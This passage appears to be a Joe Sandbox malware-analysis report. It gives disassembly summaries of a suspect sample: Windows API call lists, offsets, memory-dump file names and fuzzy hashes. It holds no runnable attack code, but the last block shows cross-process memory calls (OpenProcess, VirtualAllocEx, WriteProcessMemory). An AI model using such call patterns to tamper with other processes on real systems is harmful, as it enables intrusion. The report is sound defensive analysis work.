                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: cc1423c91313477afc4a125ab56556c7a4573f6bfdbbd34f79f2b7bbe6857bc3
                                        • Instruction ID: 83b9dfb2f167762d64bebbd0fd1f5a577627420bd53055b710e81bb73839c562
                                        • Opcode Fuzzy Hash: cc1423c91313477afc4a125ab56556c7a4573f6bfdbbd34f79f2b7bbe6857bc3
                                        • Instruction Fuzzy Hash: 28214F78802305FBDB11BF64DC14BBD3BA9BB51359F144216F4A4A65B0E3B059E1CF94
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 9e23beb547d58e37eab86478899eb1c0a667c12ef6d2c4b5bf5aa3064a7096ee
                                        • Instruction ID: c1e0d53fb6e9d4e0f2d3ae72ea3dd69fac9a4a6d041b498cac3c8a1486d9fa4e
                                        • Opcode Fuzzy Hash: 9e23beb547d58e37eab86478899eb1c0a667c12ef6d2c4b5bf5aa3064a7096ee
                                        • Instruction Fuzzy Hash: 79019671749705FAE6285510AE43EFA739C9B21396B204026FD149A781F7A1EE1196B0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0009F2DE,000A3863,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6), ref: 000A2DFD
                                        • _free.LIBCMT ref: 000A2E32
                                        • _free.LIBCMT ref: 000A2E59
                                        • SetLastError.KERNEL32(00000000,00071129), ref: 000A2E66
                                        • SetLastError.KERNEL32(00000000,00071129), ref: 000A2E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: b15e97fcd66fd9427c7555ed46dc8c1d4ed6a6ca71dcb8bb85d656a3e6c967d8
                                        • Instruction ID: 70adf8158df28f289b1d182508abe2d0a45f0b692532c8a4f34def934905f88e
                                        • Opcode Fuzzy Hash: b15e97fcd66fd9427c7555ed46dc8c1d4ed6a6ca71dcb8bb85d656a3e6c967d8
                                        • Instruction Fuzzy Hash: C801F4322056006BC622A7FD6C46EAF2699BBD37B1B214238F425E6293EB70CC814560
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?,?,000D035E), ref: 000D002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?), ref: 000D0064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 8b556f54e4d2702cc82d70315bce2f9b0a4138119d03f0bc2cf3fcb809d55b92
                                        • Instruction ID: b51b930fdfd9f23df6ee0496dd0c90a9cf995c5e1389bfad6a6acec7950aa093
                                        • Opcode Fuzzy Hash: 8b556f54e4d2702cc82d70315bce2f9b0a4138119d03f0bc2cf3fcb809d55b92
                                        • Instruction Fuzzy Hash: 75018F72600304BFDB104F68DC04BAA7EEDEB84752F14822AF949D6210DBB1DD808BA0
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000DE997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 000DE9A5
                                        • Sleep.KERNEL32(00000000), ref: 000DE9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 000DE9B7
                                        • Sleep.KERNEL32 ref: 000DE9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: e06c6bed41d5234eb07d4f6559f6cb8fbdb0b4fd279a6e07f27fb3de89b54ca9
                                        • Instruction ID: 5263338f04b52c40b4db5dd15b0d0b5a42a0f8d2ef80d4619d0750b40a0e6680
                                        • Opcode Fuzzy Hash: e06c6bed41d5234eb07d4f6559f6cb8fbdb0b4fd279a6e07f27fb3de89b54ca9
                                        • Instruction Fuzzy Hash: 62012931C02629DBCF50AFE5DC69AEDFB78FF09701F000656E542B6241CB709595CBA1
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000D1114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000D0B9B,?,?,?), ref: 000D1136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000D114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
                                        • Opcode ID: 2abb05490d6ae00e93d43e5f0ea424e2b25f6bc4fb8d754935e790b60f21bd02
                                        • Instruction ID: 094e8be964b532739a2176a89a433e8a77ee5f52654e652c0deb9729144ac55e
                                        • Opcode Fuzzy Hash: 2abb05490d6ae00e93d43e5f0ea424e2b25f6bc4fb8d754935e790b60f21bd02
                                        • Instruction Fuzzy Hash: E1011D79100305FFDB114F65DC49AAA3BBEFF89360B204515FA85D7350DA71DC409EA0
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000D0FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000D0FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000D0FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000D0FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000D1002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 32b4ffad1555ae63d7e1194d2a3cde5b3a7254a7108267d89343f274451ac9c9
                                        • Instruction ID: ba9b0ee85fe98315472cb47b5acd1f335f3cd08592fcabae6bfff760b1e32158
                                        • Opcode Fuzzy Hash: 32b4ffad1555ae63d7e1194d2a3cde5b3a7254a7108267d89343f274451ac9c9
                                        • Instruction Fuzzy Hash: 78F04939200301FBDB215FA4AC49F963FADFF89762F204515FA85C6291CAB0DC808EA0
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000D102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000D1036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000D104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000D1062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: b91a7d4669bef267ee8361b7857423ada3c6656a48ef32a292cd07ef4144da7d
                                        • Instruction ID: 98658ed8a0b8a5bdceeacb7b61bea82ad6c0b53119e3a3fab0a3297c15f620e4
                                        • Opcode Fuzzy Hash: b91a7d4669bef267ee8361b7857423ada3c6656a48ef32a292cd07ef4144da7d
                                        • Instruction Fuzzy Hash: 8EF04939200301FBDB216FA4EC49F963FADFF89761F200515FA85C6250CAB0D8908EA0
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0324
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0331
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E033E
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E034B
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0358
                                        • CloseHandle.KERNEL32(?,?,?,?,000E017D,?,000E32FC,?,00000001,000B2592,?), ref: 000E0365
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 8601cd8ab9efa0fee776dce1afb91090e7f0c65d95cf7abad9280be9687f0880
                                        • Instruction ID: 76e7ae2bab7ac1005350f278aef25a09b985f8ac9510e5d423d8b0f032435b2e
                                        • Opcode Fuzzy Hash: 8601cd8ab9efa0fee776dce1afb91090e7f0c65d95cf7abad9280be9687f0880
                                        • Instruction Fuzzy Hash: FF01A272800B559FC7309F66D880412F7F9BF503153158A3FD19662931C3B1AA94CF80
                                        APIs
                                        • _free.LIBCMT ref: 000AD752
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000AD764
                                        • _free.LIBCMT ref: 000AD776
                                        • _free.LIBCMT ref: 000AD788
                                        • _free.LIBCMT ref: 000AD79A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: d4993a61a34fc423b5f176f9f0059757b23e8967b1bf87ac9c8de6ec9ffa8ecd
                                        • Instruction ID: 65a6ab9d69be2c789c219cb098a00256b4a6caaedbdb9dffe0a6f27659a7dc19
                                        • Opcode Fuzzy Hash: d4993a61a34fc423b5f176f9f0059757b23e8967b1bf87ac9c8de6ec9ffa8ecd
                                        • Instruction Fuzzy Hash: CFF04F32508208AFC6A5EBA8F9C5C5F77DDBB06710B950816F049E7912D720FC8087A1
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5C58
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 000D5C6F
                                        • MessageBeep.USER32(00000000), ref: 000D5C87
                                        • KillTimer.USER32(?,0000040A), ref: 000D5CA3
                                        • EndDialog.USER32(?,00000001), ref: 000D5CBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: ffec48322cfec367f90701dc78bae27e3bb208d21661c06372f53c8924d34391
                                        • Instruction ID: d25467b1b8b8a0ffb3850727ad75b5eff4c542fa2145f20a4948683e96a1aaea
                                        • Opcode Fuzzy Hash: ffec48322cfec367f90701dc78bae27e3bb208d21661c06372f53c8924d34391
                                        • Instruction Fuzzy Hash: EF018630510B04AFEB305B10DD4EFA67BB8BB00B46F04165AA983A15E1DBF5A9C48EA0
                                        APIs
                                        • _free.LIBCMT ref: 000A22BE
                                          • Part of subcall function 000A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000), ref: 000A29DE
                                          • Part of subcall function 000A29C8: GetLastError.KERNEL32(00000000,?,000AD7D1,00000000,00000000,00000000,00000000,?,000AD7F8,00000000,00000007,00000000,?,000ADBF5,00000000,00000000), ref: 000A29F0
                                        • _free.LIBCMT ref: 000A22D0
                                        • _free.LIBCMT ref: 000A22E3
                                        • _free.LIBCMT ref: 000A22F4
                                        • _free.LIBCMT ref: 000A2305
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 889295d67610d4f032ff0cb891637f9a2f161cb4042d53ef6eeadc88fb7e1817
                                        • Instruction ID: 31a1c20c54e3fadff194a495860ccd52b1493b2a466d4aa413a7d20443f0ee4c
                                        • Opcode Fuzzy Hash: 889295d67610d4f032ff0cb891637f9a2f161cb4042d53ef6eeadc88fb7e1817
                                        • Instruction Fuzzy Hash: 7DF03078800210AFC753AFA8BC0184D3BA4B71BB617100566F514E2A72C73009D1AFE5
                                        APIs
                                        • EndPath.GDI32(?), ref: 000895D4
                                        • StrokeAndFillPath.GDI32(?,?,000C71F7,00000000,?,?,?), ref: 000895F0
                                        • SelectObject.GDI32(?,00000000), ref: 00089603
                                        • DeleteObject.GDI32 ref: 00089616
                                        • StrokePath.GDI32(?), ref: 00089631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 4b546e2b1d008ee795818e8f787e323f19f14c2a7f619ec9eb97ca804575b967
                                        • Instruction ID: 1e770f5b8538100b0eb56a56f6727074aaa6b39cf59da736da266b7ff2cf96de
                                        • Opcode Fuzzy Hash: 4b546e2b1d008ee795818e8f787e323f19f14c2a7f619ec9eb97ca804575b967
                                        • Instruction Fuzzy Hash: DBF0EC39006708EBDB266F65ED5C7783BA5BB02326F088314F4A9558F0DB7089E5DF60
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: __freea$_free
                                        • String ID: a/p$am/pm
                                        • API String ID: 3432400110-3206640213
                                        • Opcode ID: c0f6519f44c8b46bec39f19efb6a5abc68b4dbdc1320155c628f868f77da8e52
                                        • Instruction ID: 579234bbfacd60bc6a4b38e62723fee7bf74a614d6ddb5a4cd8050a8f1aa34b2
                                        • Opcode Fuzzy Hash: c0f6519f44c8b46bec39f19efb6a5abc68b4dbdc1320155c628f868f77da8e52
                                        • Instruction Fuzzy Hash: EAD10272900206DACF689FE8C855BFEB7F5EF07310F284159E901AB691D3759E80CB91
                                        APIs
                                          • Part of subcall function 00090242: EnterCriticalSection.KERNEL32(0014070C,00141884,?,?,0008198B,00142518,?,?,?,000712F9,00000000), ref: 0009024D
                                          • Part of subcall function 00090242: LeaveCriticalSection.KERNEL32(0014070C,?,0008198B,00142518,?,?,?,000712F9,00000000), ref: 0009028A
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                          • Part of subcall function 000900A3: __onexit.LIBCMT ref: 000900A9
                                        • __Init_thread_footer.LIBCMT ref: 000F7BFB
                                          • Part of subcall function 000901F8: EnterCriticalSection.KERNEL32(0014070C,?,?,00088747,00142514), ref: 00090202
                                          • Part of subcall function 000901F8: LeaveCriticalSection.KERNEL32(0014070C,?,00088747,00142514), ref: 00090235
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                        • String ID: 5$G$Variable must be of type 'Object'.
                                        • API String ID: 535116098-3733170431
                                        • Opcode ID: 1d39635046b9d1ae973fec8ebc2ff33a8cc47d841910c9173098907327e6d6f9
                                        • Instruction ID: 1dddef348f96d3548cfa2678136826125f44a159b6bb19b845f87e4f2de43331
                                        • Opcode Fuzzy Hash: 1d39635046b9d1ae973fec8ebc2ff33a8cc47d841910c9173098907327e6d6f9
                                        • Instruction Fuzzy Hash: 69918C70A04209EFCB14EF54D991DFDB7B1BF49300F508059FA0AAB692DB71AE41EB52
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 000A8B6E
                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 000A8B7A
                                        • __dosmaperr.LIBCMT ref: 000A8B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                        • String ID: .
                                        • API String ID: 2434981716-3497715306
                                        APIs
                                          • Part of subcall function 000DB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000D21D0,?,?,00000034,00000800,?,00000034), ref: 000DB42D
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000D2760
                                          • Part of subcall function 000DB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000D21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 000DB3F8
                                          • Part of subcall function 000DB32A: GetWindowThreadProcessId.USER32(?,?), ref: 000DB355
                                          • Part of subcall function 000DB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000D2194,00000034,?,?,00001004,00000000,00000000), ref: 000DB365
                                          • Part of subcall function 000DB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000D2194,00000034,?,?,00001004,00000000,00000000), ref: 000DB37B
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000D27CD
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000D281A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
